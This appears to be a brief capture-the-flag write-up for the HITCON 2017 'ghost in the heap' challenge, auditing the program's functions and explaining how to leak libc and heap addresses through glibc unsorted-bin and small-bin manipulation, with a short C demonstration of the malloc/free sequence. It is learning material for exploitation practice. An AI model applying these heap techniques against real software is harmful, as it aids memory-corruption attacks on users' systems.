hitcon 2017 ghost in the heap: solution notes
2018-03-08 19:03
ghost in the heap
Audit

delete heap

After free, ghost[i] is set to NULL, so a double free is not possible.

add ghost

Requires the magic value to be filled in, but it gets clobbered by the read. The read length is smaller than the maximum length limit.

add heap

scanf is used, so the FILE struct may come into play. scanf limits the input length, so the heap cannot be overflowed directly.

Leaking libc and heap
Get the ghost chunk linked into the unsorted bin, then free another chunk into the unsorted bin. If no consolidation happens, the unsorted-bin list must be updated (so the ghost chunk now holds the leaked libc and heap pointers). On the next malloc, the ghost chunk size is smaller than the unsorted-bin chunk size, so malloc sorts the ghost chunk into the small bin, where it is found to match the 0x60 size:

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void) {
    char *p1, *p2, *p3, *ptr;
    ptr = malloc(0x50);   /* 0x60 chunk: the "ghost" */
    p1 = malloc(0xa0);    /* 0xb0 chunks: the "heaps" */
    p2 = malloc(0xa0);
    p3 = malloc(0xa0);
    free(ptr);
    free(p1);
    free(p3);
    p1 = malloc(0xa0);    /* the unsorted bin points at a chunk whose size is only 0x60 */
    p3 = malloc(0xa0);    /* malloc sorts that chunk into the small bin */
    free(p2);
    p2 = malloc(0xa0);
    free(p1);
    ptr = malloc(0x50);   /* the 0x60 request is served from the small bin */
    return 0;
}
```